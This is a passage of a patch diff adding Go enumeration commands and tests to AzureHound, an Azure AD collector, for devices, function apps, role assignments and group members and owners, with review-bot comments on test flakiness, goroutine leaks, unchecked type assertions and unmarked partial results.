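Review bot: The last assertion in `TestListDeviceOwners` checks `len(data.Owners) != 1` but reports `want 2`, so a failure prints a misleading expectation; it should be `t.Errorf("got %v, want %v", len(data.Owners), 1)`. The test also assumes the first `AzureWrapper` received was built from `mockDeviceOwnerChannel` and the second from `mockDeviceOwnerChannel2`. Since `listDeviceOwners` fans the ids out over `config.ColStreamCount` worker goroutines, that ordering may not be guaranteed and is worth confirming or making order-independent.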
@@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listDevicesCmd) +} + +var listDevicesCmd = &cobra.Command{ + Use: "devices", + Long: "Lists Azure Active Directory Devices", + Run: listDevicesCmdImpl, + SilenceUsage: true, +} + +func listDevicesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory devices...") + start := time.Now() + stream := listDevices(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listDevices(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := 
make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureDevices(ctx, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing devices") + return + } else { + log.V(2).Info("found device", "device", item) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZDevice, + Data: models.Device{ + Device: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + }, + }); !ok { + return + } + } + } + log.Info("finished listing all devices", "count", count) + }() + + return out +} diff --git a/cmd/list-devices_test.go b/cmd/list-devices_test.go new file mode 100644 index 0000000..a2a19ed --- /dev/null +++ b/cmd/list-devices_test.go 
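Review bot: When `item.Error != nil` in `listDevices`, the goroutine returns and closes `out`, and `listDevicesCmdImpl` then logs "collection completed" exactly as it does for a full run, so a truncated device inventory differs from a complete one by a single error line. Recording the progress in that line, `log.Error(item.Error, "unable to continue processing devices", "count", count)`, would at least show how many devices were emitted before the stop. A short comment on the `return` stating that output is partial from this point on would help whoever consumes the file downstream.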
@@ -0,0 +1,69 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListDevices(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+ mockChannel := make(chan client.AzureResult[azure.Device])
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureDevices(gomock.Any(), gomock.Any()).Return(mockChannel)
+
+ go func() {
+ defer close(mockChannel)
+ mockChannel <- client.AzureResult[azure.Device]{
+ Ok: azure.Device{},
+ }
+ mockChannel <- client.AzureResult[azure.Device]{
+ Error: mockError,
+ }
+ mockChannel <- client.AzureResult[azure.Device]{
+ Ok: azure.Device{},
+ }
+ }()
+
+ channel := listDevices(ctx, mockClient)
+ result := <-channel
+ if _, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("expected channel to close from an error result but it did not")
+ }
+}
diff --git a/cmd/list-function-app-role-assignments.go b/cmd/list-function-app-role-assignments.go
new file mode 100644
index 0000000..66dc6fa
--- /dev/null
+++ b/cmd/list-function-app-role-assignments.go
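Review bot: The producer goroutine in `TestListDevices` never finishes, because `listDevices` returns on the first `item.Error` and the third send on the unbuffered `mockChannel` then blocks forever, so `defer close(mockChannel)` never runs. Giving the channel room for all three results, `mockChannel := make(chan client.AzureResult[azure.Device], 3)`, keeps the check that the output closes after the error while letting the goroutine exit. `TestListGroups` in cmd/list-groups_test.go has the same shape. The bare receive `result := <-channel` also has no timeout, so a regression in the producer shows up as a hung test run rather than a failure.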
@@ -0,0 +1,136 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "path"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listFunctionAppRoleAssignment)
+}
+
+var listFunctionAppRoleAssignment = &cobra.Command{
+ Use: "function-app-role-assignments",
+ Long: "Lists Azure Function App Role Assignments",
+ Run: listFunctionAppRoleAssignmentImpl,
+ SilenceUsage: true,
+}
+
+func listFunctionAppRoleAssignmentImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure function app role assignments...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ stream := listFunctionAppRoleAssignments(ctx, azClient, listFunctionApps(ctx, azClient, subscriptions))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listFunctionAppRoleAssignments(ctx context.Context, client client.AzureClient, functionApps <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), functionApps) {
+ if functionApp, ok := result.(AzureWrapper).Data.(models.FunctionApp); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating function app role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, functionApp.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ functionAppRoleAssignments = models.AzureRoleAssignments{
+ ObjectId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this function app", "functionAppId", id)
+ } else {
+ roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId)
+
+ functionAppRoleAssignment := models.AzureRoleAssignment{
+ Assignee: item.Ok,
+ ObjectId: id,
+ RoleDefinitionId: roleDefinitionId,
+ }
+ log.V(2).Info("Found function app role asignment", "functionAppRoleAssignment", functionAppRoleAssignment)
+ count++
+ functionAppRoleAssignments.RoleAssignments = append(functionAppRoleAssignments.RoleAssignments, functionAppRoleAssignment)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZFunctionAppRoleAssignment,
+ Data: functionAppRoleAssignments,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing function app role assignments", "functionAppId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all function app role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-function-apps.go b/cmd/list-function-apps.go
new file mode 100644
index 0000000..a055412
--- /dev/null
+++ b/cmd/list-function-apps.go
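Review bot: The outer assertion in `result.(AzureWrapper).Data.(models.FunctionApp)` is unchecked, so a value on `functionApps` that is not an `AzureWrapper` panics instead of reaching the `log.Error` branch that the comma-ok form on `.Data` was written for. Checking both steps, `wrapper, ok := result.(AzureWrapper)` and then `functionApp, ok := wrapper.Data.(models.FunctionApp)`, keeps the failure on the logged path; what the deferred `panicrecovery.PanicRecovery()` does with the panic is not visible in this patch section. The same expression is used in listFunctionApps, listGroupMembers, listGroupOwners and listKeyVaultAccessPolicies. Separately, the log message `"Found function app role asignment"` misspells "assignment".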
@@ -0,0 +1,129 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listFunctionAppsCmd) +} + +var listFunctionAppsCmd = &cobra.Command{ + Use: "function-apps", + Long: "Lists Azure Function Apps", + Run: listFunctionAppsCmdImpl, + SilenceUsage: true, +} + +func listFunctionAppsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure function apps...") + start := time.Now() + stream := listFunctionApps(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listFunctionApps(ctx 
context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating function apps", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureFunctionApps(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing function apps for this subscription", "subscriptionId", id) + } else { + functionApp := models.FunctionApp{ + FunctionApp: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + ResourceGroupName: item.Ok.ResourceGroupName(), + TenantId: client.TenantInfo().TenantId, + } + if functionApp.Kind == "functionapp" { + log.V(2).Info("found function app", "functionApp", functionApp) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZFunctionApp, + Data: functionApp, + }); !ok { + return + } + } + } + } + log.V(1).Info("finished listing function apps", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all function apps") + }() + + return out +} diff --git a/cmd/list-group-members.go b/cmd/list-group-members.go new file mode 100644 index 0000000..330fbac --- /dev/null 
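Review bot: The filter `if functionApp.Kind == "functionapp"` in the worker loop of `listFunctionApps` is an exact match, so a site whose kind is a compound value is skipped without a log line and never counted. Azure reports Linux function apps with kinds such as `functionapp,linux`; if `item.Ok.Kind` carries that raw value (the model is outside this hunk), those apps drop out of this collection and out of the role-assignment pass that consumes the stream. Either match on the leading token or state the exclusion in a comment, for example `// only plain "functionapp" sites; compound kinds such as "functionapp,linux" are skipped`.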
+++ b/cmd/list-group-members.go 
@@ -0,0 +1,142 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listGroupMembersCmd) + listGroupMembersCmd.Flags().StringSliceVar(&listGroupMembersSelect, "select", []string{"id,displayName,createdDateTime"}, `Select properties to include. Use "" for Azure default properties. 
Azurehound default is "id,displayName,createdDateTime" if flag is not supplied.`) +} + +var listGroupMembersCmd = &cobra.Command{ + Use: "group-members", + Long: "Lists Azure AD Group Members", + Run: listGroupMembersCmdImpl, + SilenceUsage: true, +} + +var listGroupMembersSelect []string + +func listGroupMembersCmdImpl(cmd *cobra.Command, _ []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure group members...") + start := time.Now() + stream := listGroupMembers(ctx, azClient, listGroups(ctx, azClient)) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listGroupMembers(ctx context.Context, client client.AzureClient, groups <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + params = query.GraphParams{ + Select: unique(listGroupMembersSelect), + Filter: "", + Count: false, + Search: "", + Top: 0, + Expand: "", + } + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), groups) { + if group, ok := result.(AzureWrapper).Data.(models.Group); !ok { + log.Error(fmt.Errorf("failed group type assertion"), "unable to continue enumerating group members", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, group.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + data = models.GroupMembers{ + GroupId: id, + } + count = 0 + ) + for item := range client.ListAzureADGroupMembers(ctx, id, params) { + if 
item.Error != nil { + log.Error(item.Error, "unable to continue processing members for this group", "groupId", id) + } else { + groupMember := models.GroupMember{ + Member: item.Ok, + GroupId: id, + } + log.V(2).Info("found group member", "groupMember", groupMember) + count++ + data.Members = append(data.Members, groupMember) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZGroupMember, + Data: data, + }); !ok { + return + } + log.V(1).Info("finished listing group memberships", "groupId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing members for all groups") + }() + + return out +} diff --git a/cmd/list-group-members_test.go b/cmd/list-group-members_test.go new file mode 100644 index 0000000..495d28f --- /dev/null +++ b/cmd/list-group-members_test.go 
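Review bot: When `client.ListAzureADGroupMembers` yields an `item.Error` in the worker loop of `listGroupMembers`, the error is only logged and the members gathered so far are still sent as an ordinary `KindAZGroupMember` record, so a consumer cannot tell a truncated membership list from a complete one. For an access-graph collector that means missing edges with no marker in the output, and the message "unable to continue processing" does not match a loop that continues. At minimum set a `failed` flag in the error branch and add `"partial", failed` to the `"finished listing group memberships"` log line, with a comment on the branch such as `// errors are logged and skipped: the record may hold only part of the membership`. listGroupOwners and listFunctionAppRoleAssignments follow the same pattern.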
@@ -0,0 +1,102 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "encoding/json"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListGroupMembers(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockGroupsChannel := make(chan interface{})
+ mockGroupMemberChannel := make(chan client.AzureResult[json.RawMessage])
+ mockGroupMemberChannel2 := make(chan client.AzureResult[json.RawMessage])
+
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureADGroupMembers(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockGroupMemberChannel).Times(1)
+ mockClient.EXPECT().ListAzureADGroupMembers(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockGroupMemberChannel2).Times(1)
+ channel := listGroupMembers(ctx, mockClient, mockGroupsChannel)
+
+ go func() {
+ defer close(mockGroupsChannel)
+ mockGroupsChannel <- AzureWrapper{
+ Data: models.Group{},
+ }
+ mockGroupsChannel <- AzureWrapper{
+ Data: models.Group{},
+ }
+ }()
+ go func() {
+ defer close(mockGroupMemberChannel)
+ mockGroupMemberChannel <- client.AzureResult[json.RawMessage]{
+ Ok: json.RawMessage{},
+ }
+ mockGroupMemberChannel <- client.AzureResult[json.RawMessage]{
+ Ok: json.RawMessage{},
+ }
+ }()
+ go func() {
+ defer close(mockGroupMemberChannel2)
+ mockGroupMemberChannel2 <- client.AzureResult[json.RawMessage]{
+ Ok: json.RawMessage{},
+ }
+ mockGroupMemberChannel2 <- client.AzureResult[json.RawMessage]{
+ Error: mockError,
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if data, ok := wrapper.Data.(models.GroupMembers); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.GroupMembers{})
+ } else if len(data.Members) != 2 {
+ t.Errorf("got %v, want %v", len(data.Members), 2)
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if data, ok := wrapper.Data.(models.GroupMembers); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.GroupMembers{})
+ } else if len(data.Members) != 1 {
+ t.Errorf("got %v, want %v", len(data.Members), 1)
+ }
+}
diff --git a/cmd/list-group-owners.go b/cmd/list-group-owners.go
new file mode 100644
index 0000000..2db015b
--- /dev/null
+++ b/cmd/list-group-owners.go
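Review bot: The two result checks in `TestListGroupMembers` assume the record with 2 members arrives before the record with 1, but `listGroupMembers` fans the group ids out over `config.ColStreamCount` workers that send to `out` independently. If that count is above 1 in the test process (its value is not visible here), either worker can finish first and the test fails intermittently. Collect both results and compare the member counts without depending on arrival order, for instance by sorting the two lengths before asserting; `TestListGroupOwners` makes the same assumption.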
@@ -0,0 +1,132 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listGroupOwnersCmd)
+}
+
+var listGroupOwnersCmd = &cobra.Command{
+ Use: "group-owners",
+ Long: "Lists Azure AD Group Owners",
+ Run: listGroupOwnersCmdImpl,
+ SilenceUsage: true,
+}
+
+func listGroupOwnersCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure group owners...")
+ start := time.Now()
+ stream := listGroupOwners(ctx, azClient, listGroups(ctx, azClient))
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listGroupOwners(ctx context.Context, client client.AzureClient, groups <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ params = query.GraphParams{}
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), groups) {
+ if group, ok := result.(AzureWrapper).Data.(models.Group); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating group owners", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, group.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ groupOwners = models.GroupOwners{
+ GroupId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListAzureADGroupOwners(ctx, id, params) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing owners for this group", "groupId", id)
+ } else {
+ groupOwner := models.GroupOwner{
+ Owner: item.Ok,
+ GroupId: id,
+ }
+ log.V(2).Info("found group owner", "groupOwner", groupOwner)
+ count++
+ groupOwners.Owners = append(groupOwners.Owners, groupOwner)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZGroupOwner,
+ Data: groupOwners,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing group owners", "groupId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all group owners")
+ }()
+
+ return out
+}
diff --git a/cmd/list-group-owners_test.go b/cmd/list-group-owners_test.go
new file mode 100644
index 0000000..57e8536
--- /dev/null
+++ b/cmd/list-group-owners_test.go
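Review bot: `listGroupOwnersCmdImpl` never calls `panicrecovery.HandleBubbledPanic(ctx, stop, log)`, although the devices, groups and function-app commands in this patch call it between building the stream and `outputStream`; `listGroupMembersCmdImpl` omits it as well. The workers here still defer `panicrecovery.PanicRecovery()`, so if that pair is how a recovered panic stops the run (the package is not shown), a panic in a group-owner worker would be recovered with nothing acting on it and the output would end early without an error. Add `panicrecovery.HandleBubbledPanic(ctx, stop, log)` before `outputStream(ctx, stream)` in both commands, or add a comment explaining why these two differ.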
@@ -0,0 +1,102 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "encoding/json"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListGroupOwners(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockGroupsChannel := make(chan interface{})
+ mockGroupOwnerChannel := make(chan client.AzureResult[json.RawMessage])
+ mockGroupOwnerChannel2 := make(chan client.AzureResult[json.RawMessage])
+
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureADGroupOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockGroupOwnerChannel).Times(1)
+ mockClient.EXPECT().ListAzureADGroupOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockGroupOwnerChannel2).Times(1)
+ channel := listGroupOwners(ctx, mockClient, mockGroupsChannel)
+
+ go func() {
+ defer close(mockGroupsChannel)
+ mockGroupsChannel <- AzureWrapper{
+ Data: models.Group{},
+ }
+ mockGroupsChannel <- AzureWrapper{
+ Data: models.Group{},
+ }
+ }()
+ go func() {
+ defer close(mockGroupOwnerChannel)
+ mockGroupOwnerChannel <- client.AzureResult[json.RawMessage]{
+ Ok: json.RawMessage{},
+ }
+ mockGroupOwnerChannel <- client.AzureResult[json.RawMessage]{
+ Ok: json.RawMessage{},
+ }
+ }()
+ go func() {
+ defer close(mockGroupOwnerChannel2)
+ mockGroupOwnerChannel2 <- client.AzureResult[json.RawMessage]{
+ Ok: json.RawMessage{},
+ }
+ mockGroupOwnerChannel2 <- client.AzureResult[json.RawMessage]{
+ Error: mockError,
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
